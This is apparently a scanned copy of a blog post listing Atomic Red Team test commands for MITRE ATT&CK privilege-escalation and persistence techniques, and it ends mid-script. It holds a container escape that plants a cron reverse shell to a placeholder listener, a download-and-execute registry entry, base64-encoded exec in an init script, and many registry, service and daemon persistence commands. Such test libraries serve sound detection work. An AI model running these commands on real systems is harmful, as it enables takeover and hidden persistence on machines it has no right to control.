www.cnblogs.com
Open in
urlscan Pro
2400:3200:1300::ec2
Public Scan
URL:
https://www.cnblogs.com/autopwn/p/17511222.html
Submission: On November 24 via manual from RU — Scanned from DE
Submission: On November 24 via manual from RU — Scanned from DE
Form analysis 1 forms found in the DOM
GET https://zzk.cnblogs.com/s
<form id="zzk_search" class="navbar-search dropdown" action="https://zzk.cnblogs.com/s" method="get" role="search">
<input name="w" id="zzk_search_input" placeholder="代码改变世界" type="search" tabindex="3" autocomplete="off">
<button id="zzk_search_button" onclick="window.navbarSearchManager.triggerActiveOption()">
<img id="search_icon" class="focus-hidden" src="//common.cnblogs.com/icons/search.svg" alt="搜索">
<img class="hidden focus-visible" src="//common.cnblogs.com/icons/enter.svg" alt="搜索">
</button>
<ul id="navbar_search_options" class="dropdown-menu quick-search-menu">
<li tabindex="0" class="active" onclick="zzkSearch(event, document.getElementById('zzk_search_input').value)">
<div class="keyword-wrapper">
<img src="//common.cnblogs.com/icons/search.svg" alt="搜索">
<div class="keyword"></div>
</div>
<span class="search-area">所有博客</span>
</li>
<li tabindex="1" onclick="zzkBlogSearch(event, 'autopwn', document.getElementById('zzk_search_input').value)">
<div class="keyword-wrapper">
<img src="//common.cnblogs.com/icons/search.svg" alt="搜索">
<div class="keyword"></div>
</div>
<span class="search-area">当前博客</span>
</li>
</ul>
</form>Text Content
*
* 会员
* 新闻
* 博问
* 闪存
* 班级
* AI培训
* *
所有博客
*
当前博客
* 我的博客 我的园子 账号设置 简洁模式 ... 退出登录
注册 登录
皇帽讲绿帽带法技巧
* 博客园
* 首页
* 新随笔
* 联系
* 订阅
* 管理
随笔 - 611 文章 - 0 评论 - 27 阅读 - 21万
ATOMIC-权限提升
T1611
Escape to Host
T1547
Boot or Logon Autostart Execution
T1547.015
Boot or Logon Autostart Execution: Login Items
T1547.014
Active Setup
T1547.010
Boot or Logon Autostart Execution: Port Monitors
T1547.009
Boot or Logon Autostart Execution: Shortcut Modification
T1547.008
Boot or Logon Autostart Execution: LSASS Driver
T1547.007
Boot or Logon Autostart Execution: Re-opened Applications
T1547.006
Boot or Logon Autostart Execution: Kernel Modules and Extensions
T1547.005
Boot or Logon Autostart Execution: Security Support Provider
T1547.004
Boot or Logon Autostart Execution: Winlogon Helper DLL
T1547.003
Time Providers
T1547.002
Authentication Package
T1547.001
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1543.004
Create or Modify System Process: Launch Daemon
T1543.003
Create or Modify System Process: Windows Service
T1543.002
Create or Modify System Process: Systemd Service
T1543.001
Create or Modify System Process: Launch Agent
T1484.002
Domain Trust Modification
T1484.001
Domain Policy Modification: Group Policy Modification
T1134.005
Access Token Manipulation: SID-History Injection
T1134.004
Access Token Manipulation: Parent PID Spoofing
T1134.002
Create Process with Token
T1134.001
Access Token Manipulation: Token Impersonation/Theft
T1055
Process Injection
T1055.012
Process Injection: Process Hollowing
T1055.004
Process Injection: Asynchronous Procedure Call
T1055.003
Thread Execution Hijacking
T1055.001
Process Injection: Dynamic-link Library Injection
T1053.007
Kubernetes Cronjob
T1053.006
Scheduled Task/Job: Systemd Timers
T1053.005
Scheduled Task/Job: Scheduled Task
T1053.003
Scheduled Task/Job: Cron
T1053.002
Scheduled Task/Job: At
T1037.005
Boot or Logon Initialization Scripts: Startup Items
T1037.004
Boot or Logon Initialization Scripts: Rc.common
T1037.002
Boot or Logon Initialization Scripts: Logon Script (Mac)
T1037.001
Boot or Logon Initialization Scripts: Logon Script (Windows)
--------------------------------------------------------------------------------
T1611
ESCAPE TO HOST
* Atomic Test #1 - Deploy container using nsenter container escape
* Atomic Test #2 - Mount host filesystem to escape privileged Docker container
DEPLOY CONTAINER USING NSENTER CONTAINER ESCAPE
kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'
MOUNT HOST FILESYSTEM TO ESCAPE PRIVILEGED DOCKER CONTAINER
if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi
echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename}
netcat -l -p #{listen_port} 2>&1
--------------------------------------------------------------------------------
T1547
BOOT OR LOGON AUTOSTART EXECUTION
* Atomic Test #1 - Add a driver
ADD A DRIVER
pnputil.exe /add-driver "#{driver_inf}"
--------------------------------------------------------------------------------
T1547.015
BOOT OR LOGON AUTOSTART EXECUTION: LOGIN ITEMS
* Atomic Test #1 - Persistence by modifying Windows Terminal profile
* Atomic Test #2 - Add macOS LoginItem using Applescript
PERSISTENCE BY MODIFYING WINDOWS TERMINAL PROFILE
mv #{settings_json_def} #{settings_json_tmp}
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "#{settings_json_def}"
wt.exe
ADD MACOS LOGINITEM USING APPLESCRIPT
osascript #{scriptfile}
--------------------------------------------------------------------------------
T1547.014
ACTIVE SETUP
* Atomic Test #1 - HKLM - Add atomic_test key to launch executable as part of
user setup
* Atomic Test #2 - HKLM - Add malicious StubPath value to existing Active Setup
Entry
* Atomic Test #3 - HKLM - re-execute 'Internet Explorer Core Fonts' StubPath
payload by decreasing version number
HKLM - ADD ATOMIC_TEST KEY TO LAUNCH EXECUTABLE AS PART OF USER SETUP
New-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components" -Name "atomic_test" -Force
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "(Default)" "ART TEST" -Force
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" "StubPath" "#{payload}" -Force
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
HKLM - ADD MALICIOUS STUBPATH VALUE TO EXISTING ACTIVE SETUP ENTRY
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
HKLM - RE-EXECUTE 'INTERNET EXPLORER CORE FONTS' STUBPATH PAYLOAD BY DECREASING
VERSION NUMBER
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
--------------------------------------------------------------------------------
T1547.010
BOOT OR LOGON AUTOSTART EXECUTION: PORT MONITORS
* Atomic Test #1 - Add Port Monitor persistence in Registry
ADD PORT MONITOR PERSISTENCE IN REGISTRY
reg add "hklm\system\currentcontrolset\control\print\monitors\AtomicRedTeam" /v "Driver" /d "#{monitor_dll}" /t REG_SZ
--------------------------------------------------------------------------------
T1547.009
BOOT OR LOGON AUTOSTART EXECUTION: SHORTCUT MODIFICATION
* Atomic Test #1 - Shortcut Modification
* Atomic Test #2 - Create shortcut to cmd in startup folders
SHORTCUT MODIFICATION
echo [InternetShortcut] > #{shortcut_file_path}
echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path}
#{shortcut_file_path}
CREATE SHORTCUT TO CMD IN STARTUP FOLDERS
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()
--------------------------------------------------------------------------------
T1547.008
BOOT OR LOGON AUTOSTART EXECUTION: LSASS DRIVER
Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
MODIFY REGISTRY TO LOAD ARBITRARY DLL INTO LSASS - LSADBEXTPT
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "#{dll_path}"
--------------------------------------------------------------------------------
T1547.007
BOOT OR LOGON AUTOSTART EXECUTION: RE-OPENED APPLICATIONS
* Atomic Test #1 - Copy in loginwindow.plist for Re-Opened Applications
* Atomic Test #2 - Re-Opened Applications using LoginHook
* Atomic Test #3 - Append to existing loginwindow for Re-Opened Applications
COPY IN LOGINWINDOW. PLIST FOR RE-OPENED APPLICATIONS
cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
RE-OPENED APPLICATIONS USING LOGINHOOK
sudo defaults write com.apple.loginwindow LoginHook #{script}
APPEND TO EXISTING LOGINWINDOW FOR RE-OPENED APPLICATIONS
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
#{exe_path} ${FILE} && echo after && plutil -p ${FILE}
--------------------------------------------------------------------------------
T1547.006
BOOT OR LOGON AUTOSTART EXECUTION: KERNEL MODULES AND EXTENSIONS
* Atomic Test #1 - Linux - Load Kernel Module via insmod
* Atomic Test #2 - MacOS - Load Kernel Module via kextload and kmutil
* Atomic Test #3 - MacOS - Load Kernel Module via KextManagerLoadKextWithURL()
* Atomic Test #4 - Snake Malware Kernel Driver Comadmin
LINUX - LOAD KERNEL MODULE VIA INSMOD
sudo insmod #{module_path}
MACOS - LOAD KERNEL MODULE VIA KEXTLOAD AND KMUTIL
set -x
sudo kextload #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload #{module_path}
sudo kmutil load -p #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kmutil unload -p #{module_path}
MACOS - LOAD KERNEL MODULE VIA KEXTMANAGERLOADKEXTWITHURL()
sudo #{exe_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload /Library/Extensions/SoftRAID.kext
SNAKE MALWARE KERNEL DRIVER COMADMIN
$examplePath = Join-Path $env:windir "system32\Com"; if (-not (Test-Path $examplePath)) { New-Item -ItemType Directory -Path $examplePath | Out-Null }; $exampleName = "comadmin.dat"; $exampleFullPath = Join-Path $examplePath $exampleName; $randomBytes = New-Object Byte[] 0x1000; (New-Object Random).NextBytes($randomBytes); [System.IO.File]::WriteAllBytes($exampleFullPath, $randomBytes)
--------------------------------------------------------------------------------
T1547.005
BOOT OR LOGON AUTOSTART EXECUTION: SECURITY SUPPORT PROVIDER
* Atomic Test #1 - Modify SSP configuration in registry
MODIFY SSP CONFIGURATION IN REGISTRY
# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$SecurityPackagesUpdated = $SecurityPackages
$SecurityPackagesUpdated += "#{fake_ssp_dll}"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
# revert (before reboot)
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
--------------------------------------------------------------------------------
T1547.004
BOOT OR LOGON AUTOSTART EXECUTION: WINLOGON HELPER DLL
* Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell
* Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell
* Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell
* Atomic Test #4 - Winlogon HKLM Shell Key Persistence - PowerShell
* Atomic Test #5 - Winlogon HKLM Userinit Key Persistence - PowerShell
WINLOGON SHELL KEY PERSISTENCE - POWERSHELL
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
WINLOGON USERINIT KEY PERSISTENCE - POWERSHELL
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
WINLOGON NOTIFY KEY LOGON PERSISTENCE - POWERSHELL
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force
WINLOGON HKLM SHELL KEY PERSISTENCE - POWERSHELL
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
WINLOGON HKLM USERINIT KEY PERSISTENCE - POWERSHELL
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
--------------------------------------------------------------------------------
T1547.003
TIME PROVIDERS
* Atomic Test #1 - Create a new time provider
* Atomic Test #2 - Edit an existing time provider
CREATE A NEW TIME PROVIDER
net stop w32time
Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f
net start w32time
EDIT AN EXISTING TIME PROVIDER
net stop w32time
Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f
net start w32time
--------------------------------------------------------------------------------
T1547 .002
AUTHENTICATION PACKAGE
* Atomic Test #1 - Authentication Package
AUTHENTICATION PACKAGE
Copy-Item $PathToAtomicsFolder\T1547.002\bin\package.dll C:\Windows\System32\
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "Authentication Packages" /t REG_MULTI_SZ /d "msv1_0\0package.dll" /f
--------------------------------------------------------------------------------
T1547.001
BOOT OR LOGON AUTOSTART EXECUTION: REGISTRY RUN KEYS / STARTUP FOLDER
* Atomic Test #1 - Reg Key Run
* Atomic Test #2 - Reg Key RunOnce
* Atomic Test #3 - PowerShell Registry RunOnce
* Atomic Test #4 - Suspicious vbs file run from startup Folder
* Atomic Test #5 - Suspicious jse file run from startup Folder
* Atomic Test #6 - Suspicious bat file run from startup Folder
* Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder
* Atomic Test #8 - Add persistance via Recycle bin
* Atomic Test #9 - SystemBC Malware-as-a-Service Registry
* Atomic Test #10 - Change Startup Folder - HKLM Modify User Shell Folders
Common Startup Value
* Atomic Test #11 - Change Startup Folder - HKCU Modify User Shell Folders
Startup Value
* Atomic Test #12 - HKCU - Policy Settings Explorer Run Key
* Atomic Test #13 - HKLM - Policy Settings Explorer Run Key
* Atomic Test #14 - HKLM - Append Command to Winlogon Userinit KEY Value
* Atomic Test #15 - HKLM - Modify default System Shell - Winlogon Shell KEY
Value
* Atomic Test #16 - secedit used to create a Run key in the HKLM Hive
* Atomic Test #17 - Modify BootExecute Value
REG KEY RUN
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
REG KEY RUNONCE
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
POWERSHELL REGISTRY RUNONCE
$RunOnceKey = "#{reg_key_path}"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
SUSPICIOUS VBS FILE RUN FROM STARTUP FOLDER
Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
SUSPICIOUS JSE FILE RUN FROM STARTUP FOLDER
Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
SUSPICIOUS BAT FILE RUN FROM STARTUP FOLDER
Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
ADD EXECUTABLE SHORTCUT LINK TO USER STARTUP FOLDER
$Target = "C:\Windows\System32\calc.exe"
$ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Create = $WScriptShell.CreateShortcut($ShortcutLocation)
$Create.TargetPath = $Target
$Create.Save()
ADD PERSISTANCE VIA RECYCLE BIN
reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f
SYSTEMBC MALWARE-AS-A-SERVICE REGISTRY
$RunKey = "#{reg_key_path}"
Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
CHANGE STARTUP FOLDER - HKLM MODIFY USER SHELL FOLDERS COMMON STARTUP VALUE
New-Item -ItemType Directory -path "#{new_startup_folder}"
Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "#{new_startup_folder}"
CHANGE STARTUP FOLDER - HKCU MODIFY USER SHELL FOLDERS STARTUP VALUE
New-Item -ItemType Directory -path "#{new_startup_folder}"
Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}"
HKCU - POLICY SETTINGS EXPLORER RUN KEY
if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
New-Item -ItemType Key -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
}
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
HKLM - POLICY SETTINGS EXPLORER RUN KEY
if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
New-Item -ItemType Key -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
}
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
HKLM - APPEND COMMAND TO WINLOGON USERINIT KEY VALUE
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit-backup" -Value "$oldvalue";
$newvalue = $oldvalue + " #{payload}";
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$newvalue"
HKLM - MODIFY DEFAULT SYSTEM SHELL - WINLOGON SHELL KEY VALUE
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell-backup" -Value "$oldvalue";
$newvalue = $oldvalue + ", #{payload}";
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$newvalue"
SECEDIT USED TO CREATE A RUN KEY IN THE HKLM HIVE
secedit /import /db #{secedit_db} /cfg #{ini_file}
secedit /configure /db #{secedit_db}
MODIFY BOOTEXECUTE VALUE
if (!(Test-Path "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg")) { reg.exe export "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg" /y }
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "BootExecute" -Value "#{registry_value}" -Type MultiString
--------------------------------------------------------------------------------
T1543.004
CREATE OR MODIFY SYSTEM PROCESS: LAUNCH DAEMON
* Atomic Test #1 - Launch Daemon
LAUNCH DAEMON
sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
--------------------------------------------------------------------------------
T1543.003
CREATE OR MODIFY SYSTEM PROCESS: WINDOWS SERVICE
* Atomic Test #1 - Modify Fax service to run PowerShell
* Atomic Test #2 - Service Installation CMD
* Atomic Test #3 - Service Installation PowerShell
* Atomic Test #4 - TinyTurla backdoor service w64time
* Atomic Test #5 - Remote Service Installation CMD
MODIFY FAX SERVICE TO RUN POWERSHELL
sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
sc start Fax
SERVICE INSTALLATION CMD
sc.exe create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
sc.exe start #{service_name}
SERVICE INSTALLATION POWERSHELL
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
TINYTURLA BACKDOOR SERVICE W64TIME
copy #{dllfilename} %systemroot%\system32\
sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
sc config W64Time DisplayName= "Windows 64 Time"
sc description W64Time "Maintain date and time synch on all clients and services in the network"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
sc start W64Time
REMOTE SERVICE INSTALLATION CMD
sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
sc.exe \\#{remote_host} start #{service_name}
--------------------------------------------------------------------------------
T1543.002
CREATE OR MODIFY SYSTEM PROCESS: SYSTEMD SERVICE
* Atomic Test #1 - Create Systemd Service
* Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and
Reload the service.
CREATE SYSTEMD SERVICE
echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file}
echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file}
echo "Type=simple"
echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file}
echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
systemctl enable #{systemd_service_file}
systemctl start #{systemd_service_file}
CREATE SYSTEMD SERVICE FILE, ENABLE THE SERVICE , MODIFY AND RELOAD THE SERVICE.
cat > /etc/init.d/T1543.002 << EOF
#!/bin/bash
### BEGIN INIT INFO
# Provides : Atomic Test T1543.002
# Required-Start: $all
# Required-Stop :
# Default-Start: 2 3 4 5
# Default-Stop:
# Short Description: Atomic Test for Systemd Service Creation
### END INIT INFO
python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))"
EOF
chmod +x /etc/init.d/T1543.002
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ;
systemctl enable T1543.002
systemctl start T1543.002
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
systemctl daemon-reload
systemctl restart T1543.002
--------------------------------------------------------------------------------
T1543.001
CREATE OR MODIFY SYSTEM PROCESS: LAUNCH AGENT
* Atomic Test #1 - Launch Agent
* Atomic Test #2 - Event Monitor Daemon Persistence
LAUNCH AGENT
if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;
sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}
EVENT MONITOR DAEMON PERSISTENCE
sudo cp #{script_location} #{script_destination}
sudo touch /private/var/db/emondClients/#{empty_file}
--------------------------------------------------------------------------------
T1484.002
DOMAIN TRUST MODIFICATION
* Atomic Test #1 - Add Federation to Azure AD
ADD FEDERATION TO AZURE AD
Import-Module AzureAD
Import-Module AADInternals
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
try {
Connect-AzureAD -Credential $Credential -ErrorAction Stop > $null
}
catch {
Write-Host "Error: AzureAD could not connect"
